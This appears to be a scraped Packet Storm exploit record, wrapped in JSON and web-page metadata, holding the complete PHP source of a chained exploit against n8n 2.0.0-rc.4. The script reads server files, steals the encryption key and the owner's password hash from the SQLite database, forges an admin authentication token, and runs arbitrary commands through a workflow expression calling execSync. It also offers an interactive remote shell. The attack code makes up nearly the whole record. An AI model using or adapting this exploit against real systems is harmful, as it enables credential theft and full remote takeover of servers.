{“lastseen”:”2026-01-30T17:48:29″,”description”:”n8n version 2.0.0-rc.4 PHP port of a research exploit that chains together multiple vulnerabilities including arbitrary file read and sandbox escape in order to achieve remote command execution…”,”published”:”2026-01-30T00:00:00″,”modified”:”2026-01-30T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 n8n 2.0.0-rc.4 Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:214620″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-68613″,”CVE-2026-21858″],”sourceData”:”=============================================================================================================================================\\n | # Title : n8n 2.0.0-rc.4 Full chain exploit vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/docs.n8n.io\/release-notes\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/213586\/ \\u0026 CVE-2025-68613, CVE-2026-21858\\n \\n [+] Summary : a PHP port of a research exploit targeting n8n, chaining multiple vulnerabilities to ultimately achieve remote command execution (RCE).\\t\\n \\n [+] PoC : php poc.php\\n \\n \\u003c?php\\n \\n define(‘BANNER’, \\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 CVE-2026-21858 + CVE-2025-68613 – n8n Full Chain \u2551\\n \u2551 Arbitrary File Read \u2192 Token Forge \u2192 Sandbox Bypass \u2192 RCE \u2551\\n \u2551 \u2551\\n \u2551 by indoushka \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\”);\\n \\n define(‘RCE_PAYLOAD’, ‘={{ (function() { var require = this.process.mainModule.require; var execSync = require(\\”child_process\\”).execSync; return execSync(\\”CMD\\”).toString(); })() }}’);\\n \\n class Ni8mare {\\n private $base_url;\\n private $form_url;\\n private $session;\\n private $admin_token;\\n \\n public function __construct($base_url, $form_path) {\\n $this-\\u003ebase_url = rtrim($base_url, ‘\/’);\\n $this-\\u003eform_url = $this-\\u003ebase_url . ‘\/’ . ltrim($form_path, ‘\/’);\\n $this-\\u003esession = $this-\\u003einit_session();\\n $this-\\u003eadmin_token = null;\\n }\\n \\n private function init_session() {\\n $ch = curl_init();\\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\\n curl_setopt($ch, CURLOPT_TIMEOUT, 30);\\n curl_setopt($ch, CURLOPT_USERAGENT, ‘Mozilla\/5.0 (compatible; Ni8mare\/1.0)’);\\n return $ch;\\n }\\n \\n private function close_session() {\\n if ($this-\\u003esession) {\\n curl_close($this-\\u003esession);\\n }\\n }\\n \\n private function randstr($n = 12) {\\n $chars = ‘abcdefghijklmnopqrstuvwxyz0123456789’;\\n $result = ”;\\n for ($i = 0; $i \\u003c $n; $i++) {\\n $result .= $chars[random_int(0, strlen($chars) – 1)];\\n }\\n return $result;\\n }\\n \\n private function randpos() {\\n return [random_int(100, 600), random_int(100, 600)];\\n }\\n \\n private function api($method, $path, $options = []) {\\n $url = $this-\\u003ebase_url . $path;\\n $ch = curl_init($url);\\n \\n $headers = [‘Content-Type: application\/json’];\\n if ($this-\\u003eadmin_token) {\\n $headers[] = ‘Cookie: n8n-auth=’ . $this-\\u003eadmin_token;\\n }\\n \\n curl_setopt($ch, CURLOPT_CUSTOMREQUEST, strtoupper($method));\\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\\n curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\\n curl_setopt($ch, CURLOPT_TIMEOUT, $options[‘timeout’] ?? 30);\\n curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\\n \\n if (isset($options[‘json’])) {\\n curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($options[‘json’]));\\n }\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($http_code \\u003e= 200 \\u0026\\u0026 $http_code \\u003c 300) {\\n return json_decode($response, true);\\n }\\n \\n return null;\\n }\\n \\n private function lfi_payload($filepath) {\\n return [\\n ‘data’ =\\u003e [],\\n ‘files’ =\\u003e [\\n ‘f-‘ . $this-\\u003erandstr(6) =\\u003e [\\n ‘filepath’ =\\u003e $filepath,\\n ‘originalFilename’ =\\u003e $this-\\u003erandstr(8) . ‘.bin’,\\n ‘mimetype’ =\\u003e ‘application\/octet-stream’,\\n ‘size’ =\\u003e random_int(10000, 100000)\\n ]\\n ]\\n ];\\n }\\n \\n private function build_nodes($command) {\\n $trigger_name = ‘T-‘ . $this-\\u003erandstr(8);\\n $rce_name = ‘R-‘ . $this-\\u003erandstr(8);\\n $result_var = ‘v’ . $this-\\u003erandstr(6);\\n $payload_value = str_replace(‘CMD’, addslashes($command), RCE_PAYLOAD);\\n \\n $nodes = [\\n [\\n ‘parameters’ =\\u003e [],\\n ‘name’ =\\u003e $trigger_name,\\n ‘type’ =\\u003e ‘n8n-nodes-base.manualTrigger’,\\n ‘typeVersion’ =\\u003e 1,\\n ‘position’ =\\u003e $this-\\u003erandpos(),\\n ‘id’ =\\u003e ‘t-‘ . $this-\\u003erandstr(12)\\n ],\\n [\\n ‘parameters’ =\\u003e [\\n ‘values’ =\\u003e [\\n ‘string’ =\\u003e [[\\n ‘name’ =\\u003e $result_var,\\n ‘value’ =\\u003e $payload_value\\n ]]\\n ]\\n ],\\n ‘name’ =\\u003e $rce_name,\\n ‘type’ =\\u003e ‘n8n-nodes-base.set’,\\n ‘typeVersion’ =\\u003e 2,\\n ‘position’ =\\u003e $this-\\u003erandpos(),\\n ‘id’ =\\u003e ‘r-‘ . $this-\\u003erandstr(12)\\n ]\\n ];\\n \\n $connections = [\\n $trigger_name =\\u003e [\\n ‘main’ =\\u003e [[\\n ‘node’ =\\u003e $rce_name,\\n ‘type’ =\\u003e ‘main’,\\n ‘index’ =\\u003e 0\\n ]]\\n ]\\n ];\\n \\n return [$nodes, $connections, $trigger_name, $rce_name];\\n }\\n \\n public function read_file($filepath, $timeout = 30) {\\n $payload = $this-\\u003elfi_payload($filepath);\\n \\n $ch = $this-\\u003esession;\\n curl_setopt($ch, CURLOPT_URL, $this-\\u003eform_url);\\n curl_setopt($ch, CURLOPT_POST, true);\\n curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));\\n curl_setopt($ch, CURLOPT_HTTPHEADER, [‘Content-Type: application\/json’]);\\n curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);\\n curl_setopt($ch, CURLOPT_HEADER, false);\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n \\n if ($http_code \\u003e= 200 \\u0026\\u0026 $http_code \\u003c 300 \\u0026\\u0026 !empty($response)) {\\n return $response;\\n }\\n \\n return null;\\n }\\n \\n public function get_version() {\\n $resp = $this-\\u003eapi(‘GET’, ‘\/rest\/settings’, [‘timeout’ =\\u003e 10]);\\n if (!$resp) {\\n return [‘0.0.0’, false];\\n }\\n \\n $version = $resp[‘data’][‘versionCli’] ?? ‘0.0.0’;\\n $parts = explode(‘.’, $version);\\n $major = intval($parts[0] ?? 0);\\n $minor = intval($parts[1] ?? 0);\\n \\n $vuln = $major \\u003c 1 || ($major == 1 \\u0026\\u0026 $minor \\u003c 121);\\n return [$version, $vuln];\\n }\\n \\n public function get_home() {\\n $data = $this-\\u003eread_file(‘\/proc\/self\/environ’);\\n if (!$data) {\\n return null;\\n }\\n \\n $vars = explode(\\”\\\\x00\\”, $data);\\n foreach ($vars as $var) {\\n if (strpos($var, ‘HOME=’) === 0) {\\n return substr($var, 5);\\n }\\n }\\n \\n return null;\\n }\\n \\n public function get_key($home) {\\n $data = $this-\\u003eread_file($home . ‘\/.n8n\/config’);\\n if (!$data) {\\n return null;\\n }\\n \\n $config = json_decode($data, true);\\n return $config[‘encryptionKey’] ?? null;\\n }\\n \\n public function get_db($home) {\\n return $this-\\u003eread_file($home . ‘\/.n8n\/database.sqlite’, 120);\\n }\\n \\n public function extract_admin($db) {\\n $temp_file = tempnam(sys_get_temp_dir(), ‘n8n_db_’);\\n file_put_contents($temp_file, $db);\\n \\n try {\\n $pdo = new PDO(\\”sqlite:$temp_file\\”);\\n $pdo-\\u003esetAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);\\n \\n $stmt = $pdo-\\u003equery(\\”SELECT id, email, password FROM user WHERE role=’global:owner’ LIMIT 1\\”);\\n $row = $stmt-\\u003efetch(PDO::FETCH_ASSOC);\\n \\n unlink($temp_file);\\n \\n if ($row) {\\n return [$row[‘id’], $row[’email’], $row[‘password’]];\\n }\\n } catch (Exception $e) {\\n if (file_exists($temp_file)) {\\n unlink($temp_file);\\n }\\n }\\n \\n return null;\\n }\\n \\n public function forge_token($key, $uid, $email, $pw_hash) {\\n \\n $key_part = ”;\\n for ($i = 0; $i \\u003c strlen($key); $i += 2) {\\n $key_part .= $key[$i];\\n }\\n \\n $secret = hash(‘sha256’, $key_part);\\n $hash_input = $email . ‘:’ . $pw_hash;\\n $h = substr(base64_encode(hash(‘sha256’, $hash_input, true)), 0, 10);\\n \\n $header = base64_encode(json_encode([‘alg’ =\\u003e ‘HS256’, ‘typ’ =\\u003e ‘JWT’]));\\n $payload = base64_encode(json_encode([‘id’ =\\u003e $uid, ‘hash’ =\\u003e $h]));\\n $signature = base64_encode(hash_hmac(‘sha256’, \\”$header.$payload\\”, $secret, true));\\n \\n $this-\\u003eadmin_token = \\”$header.$payload.$signature\\”;\\n return $this-\\u003eadmin_token;\\n }\\n \\n public function verify_token() {\\n return $this-\\u003eapi(‘GET’, ‘\/rest\/users’, [‘timeout’ =\\u003e 10]) !== null;\\n }\\n \\n public function rce($command) {\\n list($nodes, $connections, $trigger_name, $rce_name) = $this-\\u003ebuild_nodes($command);\\n $wf_name = ‘wf-‘ . $this-\\u003erandstr(16);\\n \\n $workflow = [\\n ‘name’ =\\u003e $wf_name,\\n ‘active’ =\\u003e false,\\n ‘nodes’ =\\u003e $nodes,\\n ‘connections’ =\\u003e $connections,\\n ‘settings’ =\\u003e []\\n ];\\n \\n $resp = $this-\\u003eapi(‘POST’, ‘\/rest\/workflows’, [‘json’ =\\u003e $workflow, ‘timeout’ =\\u003e 10]);\\n if (!$resp) {\\n return null;\\n }\\n \\n $wf_id = $resp[‘data’][‘id’] ?? null;\\n if (!$wf_id) {\\n return null;\\n }\\n \\n $run_data = [\\n ‘workflowData’ =\\u003e [\\n ‘id’ =\\u003e $wf_id,\\n ‘name’ =\\u003e $wf_name,\\n ‘active’ =\\u003e false,\\n ‘nodes’ =\\u003e $nodes,\\n ‘connections’ =\\u003e $connections,\\n ‘settings’ =\\u003e []\\n ]\\n ];\\n \\n $resp = $this-\\u003eapi(‘POST’, \\”\/rest\/workflows\/$wf_id\/run\\”, [‘json’ =\\u003e $run_data, ‘timeout’ =\\u003e 30]);\\n if (!$resp) {\\n $this-\\u003eapi(‘DELETE’, \\”\/rest\/workflows\/$wf_id\\”, [‘timeout’ =\\u003e 5]);\\n return null;\\n }\\n \\n $exec_id = $resp[‘data’][‘executionId’] ?? null;\\n $result = $exec_id ? $this-\\u003eget_result($exec_id) : null;\\n \\n $this-\\u003eapi(‘DELETE’, \\”\/rest\/workflows\/$wf_id\\”, [‘timeout’ =\\u003e 5]);\\n return $result;\\n }\\n \\n private function get_result($exec_id) {\\n $resp = $this-\\u003eapi(‘GET’, \\”\/rest\/executions\/$exec_id\\”, [‘timeout’ =\\u003e 10]);\\n if (!$resp) {\\n return null;\\n }\\n \\n $data = $resp[‘data’][‘data’] ?? null;\\n if (!$data) {\\n return null;\\n }\\n \\n \/\/ Handle both cases: string JSON or already decoded array\\n if (is_string($data)) {\\n $parsed = json_decode($data, true);\\n } else {\\n $parsed = $data;\\n }\\n \\n if (!is_array($parsed)) {\\n return null;\\n }\\n \\n \/\/ Search for the result in reverse order\\n for ($i = count($parsed) – 1; $i \\u003e= 0; $i–) {\\n if (isset($parsed[$i]) \\u0026\\u0026 is_string($parsed[$i])) {\\n $item = $parsed[$i];\\n if (strlen($item) \\u003e 3 \\u0026\\u0026 !in_array($item, [‘success’, ‘error’])) {\\n return trim($item);\\n }\\n }\\n }\\n \\n return null;\\n }\\n \\n public function pwn() {\\n echo \\”[+] HOME directory… \\”;\\n $home = $this-\\u003eget_home();\\n if (!$home) {\\n echo \\”FAILED\\\\n\\”;\\n return false;\\n }\\n echo \\”OK: $home\\\\n\\”;\\n \\n echo \\”[+] Encryption key… \\”;\\n $key = $this-\\u003eget_key($home);\\n if (!$key) {\\n echo \\”FAILED\\\\n\\”;\\n return false;\\n }\\n echo \\”OK: \\” . substr($key, 0, 8) . \\”…\\\\n\\”;\\n \\n echo \\”[+] Database… \\”;\\n $db = $this-\\u003eget_db($home);\\n if (!$db) {\\n echo \\”FAILED\\\\n\\”;\\n return false;\\n }\\n echo \\”OK: \\” . strlen($db) . \\” bytes\\\\n\\”;\\n \\n echo \\”[+] Admin user… \\”;\\n $admin = $this-\\u003eextract_admin($db);\\n if (!$admin) {\\n echo \\”FAILED\\\\n\\”;\\n return false;\\n }\\n list($uid, $email, $pw) = $admin;\\n echo \\”OK: $email\\\\n\\”;\\n \\n echo \\”[+] Token forge… \\”;\\n $this-\\u003eforge_token($key, $uid, $email, $pw);\\n echo \\”OK\\\\n\\”;\\n \\n echo \\”[+] Admin access… \\”;\\n if (!$this-\\u003everify_token()) {\\n echo \\”DENIED\\\\n\\”;\\n return false;\\n }\\n echo \\”GRANTED!\\\\n\\”;\\n \\n echo \\”[+] Cookie: n8n-auth=\\” . $this-\\u003eadmin_token . \\”\\\\n\\”;\\n return true;\\n }\\n \\n public function __destruct() {\\n $this-\\u003eclose_session();\\n }\\n }\\n \\n function run_read($exploit, $path, $output = null) {\\n $data = $exploit-\\u003eread_file($path);\\n if (!$data) {\\n echo \\”[-] File read failed\\\\n\\”;\\n return;\\n }\\n \\n echo \\”[+] \\” . strlen($data) . \\” bytes\\\\n\\”;\\n \\n if ($output) {\\n file_put_contents($output, $data);\\n echo \\”[+] Saved to: $output\\\\n\\”;\\n return;\\n }\\n \\n echo $data . \\”\\\\n\\”;\\n }\\n \\n function run_cmd($exploit, $cmd) {\\n echo \\”[+] RCE… \\”;\\n $out = $exploit-\\u003erce($cmd);\\n if (!$out) {\\n echo \\”FAILED\\\\n\\”;\\n return;\\n }\\n echo \\”OK\\\\n\\\\n\\”;\\n echo $out . \\”\\\\n\\”;\\n }\\n \\n function run_shell($exploit) {\\n echo \\”[*] Interactive mode (type ‘exit’ to quit)\\\\n\\”;\\n \\n while (true) {\\n echo \\”\\\\033[91mn8n\\\\033[0m\\u003e \\”;\\n $cmd = trim(fgets(STDIN));\\n \\n if (empty($cmd) || $cmd === ‘exit’) {\\n break;\\n }\\n \\n $out = $exploit-\\u003erce($cmd);\\n if ($out) {\\n echo $out . \\”\\\\n\\”;\\n }\\n }\\n }\\n \\n function parse_args() {\\n global $argv;\\n \\n if (count($argv) \\u003c 3) {\\n echo \\”Usage: php \\” . basename($argv[0]) . \\” \\u003curl\\u003e \\u003cform_path\\u003e [options]\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” –read PATH Read arbitrary file\\\\n\\”;\\n echo \\” –cmd CMD Execute single command\\\\n\\”;\\n echo \\” –output FILE Save LFI output to file\\\\n\\”;\\n echo \\”\\\\nExample:\\\\n\\”;\\n echo \\” php exploit.php http:\/\/localhost:5678 \/form\/upload –read \/etc\/passwd\\\\n\\”;\\n echo \\” php exploit.php http:\/\/localhost:5678 \/form\/upload –cmd id\\\\n\\”;\\n echo \\” php exploit.php http:\/\/localhost:5678 \/form\/upload\\\\n\\”;\\n exit(1);\\n }\\n \\n $args = [\\n ‘url’ =\\u003e $argv[1],\\n ‘form’ =\\u003e $argv[2],\\n ‘read’ =\\u003e null,\\n ‘cmd’ =\\u003e null,\\n ‘output’ =\\u003e null\\n ];\\n \\n for ($i = 3; $i \\u003c count($argv); $i++) {\\n if ($argv[$i] === ‘–read’ \\u0026\\u0026 isset($argv[$i + 1])) {\\n $args[‘read’] = $argv[++$i];\\n } elseif ($argv[$i] === ‘–cmd’ \\u0026\\u0026 isset($argv[$i + 1])) {\\n $args[‘cmd’] = $argv[++$i];\\n } elseif ($argv[$i] === ‘–output’ \\u0026\\u0026 isset($argv[$i + 1])) {\\n $args[‘output’] = $argv[++$i];\\n }\\n }\\n \\n return $args;\\n }\\n \\n function main() {\\n echo BANNER . \\”\\\\n\\”;\\n \\n $args = parse_args();\\n $exploit = new Ni8mare($args[‘url’], $args[‘form’]);\\n \\n list($version, $vuln) = $exploit-\\u003eget_version();\\n echo \\”[*] Target: \\” . $args[‘url’] . \\”\\\\n\\”;\\n echo \\”[*] Version: $version (\\” . ($vuln ? \\”VULN\\” : \\”SAFE\\”) . \\”)\\\\n\\”;\\n \\n if ($args[‘read’]) {\\n run_read($exploit, $args[‘read’], $args[‘output’]);\\n return;\\n }\\n \\n if (!$exploit-\\u003epwn()) {\\n return;\\n }\\n \\n if ($args[‘cmd’]) {\\n run_cmd($exploit, $args[‘cmd’]);\\n return;\\n }\\n \\n run_shell($exploit);\\n }\\n \\n if (php_sapi_name() === ‘cli’) {\\n main();\\n } else {\\n echo \\”This script must be run from command line\\\\n\\”;\\n }\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214620″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214620\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-30T17:48:29″,”description”:”n8n version 2.0.0-rc.4 PHP port of a research exploit that chains together multiple vulnerabilities including arbitrary file read and sandbox escape in order to achieve…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-38351","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n